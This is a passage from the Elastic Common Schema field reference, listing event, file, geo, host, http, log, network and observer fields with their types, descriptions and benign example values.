+type: float + +-- + +*`event.risk_score_norm`*:: ++ +-- +Normalized risk score or priority of the event, on a scale of 0 to 100. +This is mainly useful if you use more than one system that assigns risk scores, and you want to see a normalized value across all systems. + +type: float + +-- + +*`event.sequence`*:: ++ +-- +Sequence number of the event. +The sequence number is a value published by some event sources, to make the exact ordering of events unambiguous, regardless of the timestamp precision. + +type: long + +format: string + +-- + +*`event.severity`*:: ++ +-- +The numeric severity of the event according to your event source. +What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. +The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. + +type: long + +example: 7 + +format: string + +-- + +*`event.start`*:: ++ +-- +event.start contains the date when the event started or when the activity was first observed. + +type: date + +-- + +*`event.timezone`*:: ++ +-- +This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. +Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). + +type: keyword + +-- + +*`event.type`*:: ++ +-- +This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. +`event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. +This field is an array. This will allow proper categorization of some events that fall in multiple event types. + +type: keyword + +-- + +*`event.url`*:: ++ +-- +URL linking to an external system to continue investigation of this event. +This URL links to another system where in-depth investigation of the specific occurrence of this event can take place. Alert events, indicated by `event.kind:alert`, are a common use case for this field. + +type: keyword + +example: https://mysystem.example.com/alert/5271dedb-f5b0-4218-87f0-4ac4870a38fe + +-- + +[float] +=== file + +A file is defined as a set of information that has been created on, or has existed on a filesystem. +File objects can be associated with host events, network events, and/or file events (e.g., those produced by File Integrity Monitoring [FIM] products or services). File fields provide details about the affected file associated with the event or metric. + + +*`file.accessed`*:: ++ +-- +Last time the file was accessed. +Note that not all filesystems keep track of access time. + +type: date + +-- + +*`file.attributes`*:: ++ +-- +Array of file attributes. +Attributes names will vary by platform. Here's a non-exhaustive list of values that are expected in this field: archive, compressed, directory, encrypted, execute, hidden, read, readonly, system, write. + +type: keyword + +example: ["readonly", "system"] + +-- + +*`file.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`file.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`file.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`file.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`file.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`file.created`*:: ++ +-- +File creation time. +Note that not all filesystems store the creation time. + +type: date + +-- + +*`file.ctime`*:: ++ +-- +Last time the file attributes or metadata changed. +Note that changes to the file content will update `mtime`. This implies `ctime` will be adjusted at the same time, since `mtime` is an attribute of the file. + +type: date + +-- + +*`file.device`*:: ++ +-- +Device that is the source of the file. + +type: keyword + +example: sda + +-- + +*`file.directory`*:: ++ +-- +Directory where the file is located. It should include the drive letter, when appropriate. + +type: keyword + +example: /home/alice + +-- + +*`file.drive_letter`*:: ++ +-- +Drive letter where the file is located. This field is only relevant on Windows. +The value should be uppercase, and not include the colon. + +type: keyword + +example: C + +-- + +*`file.extension`*:: ++ +-- +File extension, excluding the leading dot. +Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). + +type: keyword + +example: png + +-- + +*`file.gid`*:: ++ +-- +Primary group ID (GID) of the file. + +type: keyword + +example: 1001 + +-- + +*`file.group`*:: ++ +-- +Primary group name of the file. + +type: keyword + +example: alice + +-- + +*`file.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`file.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`file.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`file.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`file.inode`*:: ++ +-- +Inode representing the file in the filesystem. + +type: keyword + +example: 256383 + +-- + +*`file.mime_type`*:: ++ +-- +MIME type should identify the format of the file or stream of bytes using https://www.iana.org/assignments/media-types/media-types.xhtml[IANA official types], where possible. When more than one type is applicable, the most specific type should be used. + +type: keyword + +-- + +*`file.mode`*:: ++ +-- +Mode of the file in octal representation. + +type: keyword + +example: 0640 + +-- + +*`file.mtime`*:: ++ +-- +Last time the file content was modified. + +type: date + +-- + +*`file.name`*:: ++ +-- +Name of the file including the extension, without the directory. + +type: keyword + +example: example.png + +-- + +*`file.owner`*:: ++ +-- +File owner's username. + +type: keyword + +example: alice + +-- + +*`file.path`*:: ++ +-- +Full path to the file, including the file name. It should include the drive letter, when appropriate. + +type: keyword + +example: /home/alice/example.png + +-- + +*`file.path.text`*:: ++ +-- +type: text + +-- + +*`file.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`file.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`file.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`file.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`file.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`file.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`file.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`file.size`*:: ++ +-- +File size in bytes. +Only relevant when `file.type` is "file". + +type: long + +example: 16384 + +-- + +*`file.target_path`*:: ++ +-- +Target path for symlinks. + +type: keyword + +-- + +*`file.target_path.text`*:: ++ +-- +type: text + +-- + +*`file.type`*:: ++ +-- +File type (file, dir, or symlink). + +type: keyword + +example: file + +-- + +*`file.uid`*:: ++ +-- +The user ID (UID) or security identifier (SID) of the file owner. + +type: keyword + +example: 1001 + +-- + +*`file.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`file.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`file.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`file.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`file.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`file.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`file.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`file.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`file.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`file.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`file.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`file.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`file.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`file.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`file.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`file.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`file.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`file.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`file.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`file.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`file.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`file.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`file.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`file.x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +[float] +=== geo + +Geo fields can carry data about a specific location related to an event. +This geolocation information can be derived from techniques such as Geo IP, or be user-supplied. + + +*`geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +[float] +=== group + +The group fields are meant to represent groups that are relevant to the event. + + +*`group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +[float] +=== hash + +The hash fields represent different bitwise hash algorithms and their values. +Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). + + +*`hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +[float] +=== host + +A host is defined as a general computing instance. +ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes. + + +*`host.architecture`*:: ++ +-- +Operating system architecture. + +type: keyword + +example: x86_64 + +-- + +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.domain`*:: ++ +-- +Name of the domain of which the host is a member. +For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. + +type: keyword + +example: CONTOSO + +-- + +*`host.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`host.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`host.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`host.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`host.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`host.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`host.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`host.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`host.hostname`*:: ++ +-- +Hostname of the host. +It normally contains what the `hostname` command returns on the host machine. + +type: keyword + +-- + +*`host.id`*:: ++ +-- +Unique host id. +As hostname is not always unique, use values that are meaningful in your environment. +Example: The current usage of `beat.name`. + +type: keyword + +-- + +*`host.ip`*:: ++ +-- +Host ip addresses. + +type: ip + +-- + +*`host.mac`*:: ++ +-- +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + +-- + +*`host.name`*:: ++ +-- +Name of the host. +It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. + +type: keyword + +-- + +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`host.os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`host.os.full.text`*:: ++ +-- +type: text + +-- + +*`host.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`host.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`host.os.name.text`*:: ++ +-- +type: text + +-- + +*`host.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`host.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`host.type`*:: ++ +-- +Type of host. +For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. + +type: keyword + +-- + +*`host.uptime`*:: ++ +-- +Seconds the host has been up. + +type: long + +example: 1325 + +-- + +*`host.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`host.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`host.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`host.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`host.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`host.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`host.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`host.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`host.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`host.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`host.user.name.text`*:: ++ +-- +type: text + +-- + +*`host.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== http + +Fields related to HTTP activity. Use the `url` field set to store the url of the request. + + +*`http.request.body.bytes`*:: ++ +-- +Size in bytes of the request body. + +type: long + +example: 887 + +format: bytes + +-- + +*`http.request.body.content`*:: ++ +-- +The full HTTP request body. + +type: keyword + +example: Hello world + +-- + +*`http.request.body.content.text`*:: ++ +-- +type: text + +-- + +*`http.request.bytes`*:: ++ +-- +Total size in bytes of the request (body and headers). + +type: long + +example: 1437 + +format: bytes + +-- + +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + +*`http.request.method`*:: ++ +-- +HTTP request method. +Prior to ECS 1.6.0 the following guidance was provided: +"The field value must be normalized to lowercase for querying." +As of ECS 1.6.0, the guidance is deprecated because the original case of the method may be useful in anomaly detection. Original case will be mandated in ECS 2.0.0 + +type: keyword + +example: GET, POST, PUT, PoST + +-- + +*`http.request.mime_type`*:: ++ +-- +Mime type of the body of the request. +This value must only be populated based on the content of the request body, not on the `Content-Type` header. Comparing the mime type of a request with the request's Content-Type header can be helpful in detecting threats or misconfigured clients. + +type: keyword + +example: image/gif + +-- + +*`http.request.referrer`*:: ++ +-- +Referrer for this HTTP request. + +type: keyword + +example: https://blog.example.com/ + +-- + +*`http.response.body.bytes`*:: ++ +-- +Size in bytes of the response body. + +type: long + +example: 887 + +format: bytes + +-- + +*`http.response.body.content`*:: ++ +-- +The full HTTP response body. + +type: keyword + +example: Hello world + +-- + +*`http.response.body.content.text`*:: ++ +-- +type: text + +-- + +*`http.response.bytes`*:: ++ +-- +Total size in bytes of the response (body and headers). + +type: long + +example: 1437 + +format: bytes + +-- + +*`http.response.mime_type`*:: ++ +-- +Mime type of the body of the response. +This value must only be populated based on the content of the response body, not on the `Content-Type` header. Comparing the mime type of a response with the response's Content-Type header can be helpful in detecting misconfigured servers. + +type: keyword + +example: image/gif + +-- + +*`http.response.status_code`*:: ++ +-- +HTTP response status code. + +type: long + +example: 404 + +format: string + +-- + +*`http.version`*:: ++ +-- +HTTP version. + +type: keyword + +example: 1.1 + +-- + +[float] +=== interface + +The interface fields are used to record ingress and egress interface information when reported by an observer (e.g. firewall, router, load balancer) in the context of the observer handling a network connection. In the case of a single observer interface (e.g. network sensor on a span port) only the observer.ingress information should be populated. + + +*`interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + +[float] +=== log + +Details about the event's logging mechanism or logging transport. +The log.* fields are typically populated with details about the logging mechanism used to create and/or transport the event. For example, syslog details belong under `log.syslog.*`. +The details specific to your event source are typically not logged under `log.*`, but rather in `event.*` or in other ECS fields. + + +*`log.file.path`*:: ++ +-- +Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. +If the event wasn't read from a log file, do not populate this field. + +type: keyword + +example: /var/log/fun-times.log + +-- + +*`log.level`*:: ++ +-- +Original log level of the log event. +If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). +Some examples are `warn`, `err`, `i`, `informational`. + +type: keyword + +example: error + +-- + +*`log.logger`*:: ++ +-- +The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. + +type: keyword + +example: org.elasticsearch.bootstrap.Bootstrap + +-- + +*`log.origin.file.line`*:: ++ +-- +The line number of the file containing the source code which originated the log event. + +type: integer + +example: 42 + +-- + +*`log.origin.file.name`*:: ++ +-- +The name of the file containing the source code which originated the log event. +Note that this field is not meant to capture the log file. The correct field to capture the log file is `log.file.path`. + +type: keyword + +example: Bootstrap.java + +-- + +*`log.origin.function`*:: ++ +-- +The name of the function or method which originated the log event. + +type: keyword + +example: init + +-- + +*`log.original`*:: ++ +-- +This is the original log message and contains the full log message before splitting it up in multiple parts. +In contrast to the `message` field which can contain an extracted part of the log message, this field contains the original, full log message. It can have already some modifications applied like encoding or new lines removed to clean up the log message. +This field is not indexed and doc_values are disabled so it can't be queried but the value can be retrieved from `_source`. + +type: keyword + +example: Sep 19 08:26:10 localhost My log + +Field is not indexed. + +-- + +*`log.syslog`*:: ++ +-- +The Syslog metadata of the event, if the event was transmitted via Syslog. Please see RFCs 5424 or 3164. + +type: object + +-- + +*`log.syslog.facility.code`*:: ++ +-- +The Syslog numeric facility of the log event, if available. +According to RFCs 5424 and 3164, this value should be an integer between 0 and 23. + +type: long + +example: 23 + +format: string + +-- + +*`log.syslog.facility.name`*:: ++ +-- +The Syslog text-based facility of the log event, if available. + +type: keyword + +example: local7 + +-- + +*`log.syslog.priority`*:: ++ +-- +Syslog numeric priority of the event, if available. +According to RFCs 5424 and 3164, the priority is 8 * facility + severity. This number is therefore expected to contain a value between 0 and 191. + +type: long + +example: 135 + +format: string + +-- + +*`log.syslog.severity.code`*:: ++ +-- +The Syslog numeric severity of the log event, if available. +If the event source publishing via Syslog provides a different numeric severity value (e.g. firewall, IDS), your source's numeric severity should go to `event.severity`. If the event source does not specify a distinct severity, you can optionally copy the Syslog severity to `event.severity`. + +type: long + +example: 3 + +-- + +*`log.syslog.severity.name`*:: ++ +-- +The Syslog numeric severity of the log event, if available. +If the event source publishing via Syslog provides a different severity value (e.g. firewall, IDS), your source's text severity should go to `log.level`. If the event source does not specify a distinct severity, you can optionally copy the Syslog severity to `log.level`. + +type: keyword + +example: Error + +-- + +[float] +=== network + +The network is defined as the communication path over which a host or network event happens. +The network.* fields should be populated with details about the network activity associated with an event. + + +*`network.application`*:: ++ +-- +A name given to an application level protocol. This can be arbitrarily assigned for things like microservices, but also apply to things like skype, icq, facebook, twitter. This would be used in situations where the vendor or service can be decoded such as from the source/dest IP owners, ports, or wire format. +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: aim + +-- + +*`network.bytes`*:: ++ +-- +Total bytes transferred in both directions. +If `source.bytes` and `destination.bytes` are known, `network.bytes` is their sum. + +type: long + +example: 368 + +format: bytes + +-- + +*`network.community_id`*:: ++ +-- +A hash of source and destination IPs and ports, as well as the protocol used in a communication. This is a tool-agnostic standard to identify flows. +Learn more at https://github.com/corelight/community-id-spec. + +type: keyword + +example: 1:hO+sN4H+MG5MY/8hIrXPqc4ZQz0= + +-- + +*`network.direction`*:: ++ +-- +Direction of the network traffic. +Recommended values are: + * ingress + * egress + * inbound + * outbound + * internal + * external + * unknown + +When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". +When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". +Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. + +type: keyword + +example: inbound + +-- + +*`network.forwarded_ip`*:: ++ +-- +Host IP address when the source IP address is the proxy. + +type: ip + +example: 192.1.1.2 + +-- + +*`network.iana_number`*:: ++ +-- +IANA Protocol Number (https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml). Standardized list of protocols. This aligns well with NetFlow and sFlow related logs which use the IANA Protocol Number. + +type: keyword + +example: 6 + +-- + +*`network.inner`*:: ++ +-- +Network.inner fields are added in addition to network.vlan fields to describe the innermost VLAN when q-in-q VLAN tagging is present. Allowed fields include vlan.id and vlan.name. Inner vlan fields are typically used when sending traffic with multiple 802.1q encapsulations to a network sensor (e.g. Zeek, Wireshark.) + +type: object + +-- + +*`network.inner.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`network.inner.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`network.name`*:: ++ +-- +Name given by operators to sections of their network. + +type: keyword + +example: Guest Wifi + +-- + +*`network.packets`*:: ++ +-- +Total packets transferred in both directions. +If `source.packets` and `destination.packets` are known, `network.packets` is their sum. + +type: long + +example: 24 + +-- + +*`network.protocol`*:: ++ +-- +L7 Network protocol name. ex. http, lumberjack, transport protocol. +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: http + +-- + +*`network.transport`*:: ++ +-- +Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: tcp + +-- + +*`network.type`*:: ++ +-- +In the OSI Model this would be the Network Layer. ipv4, ipv6, ipsec, pim, etc +The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". + +type: keyword + +example: ipv4 + +-- + +*`network.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`network.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +[float] +=== observer + +An observer is defined as a special network, security, or application device used to detect, observe, or create network, security, or application-related events and metrics. +This could be a custom hardware appliance or a server that has been configured to run special network, security, or application software. Examples include firewalls, web proxies, intrusion detection/prevention systems, network monitoring sensors, web application firewalls, data loss prevention systems, and APM servers. The observer.* fields shall be populated with details of the system, if any, that detects, observes and/or creates a network, security, or application event or metric. Message queues and ETL components used in processing events or metrics are not considered observers in ECS. + + +*`observer.egress`*:: ++ +-- +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. + +type: object + +-- + +*`observer.egress.interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`observer.egress.interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`observer.egress.interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + 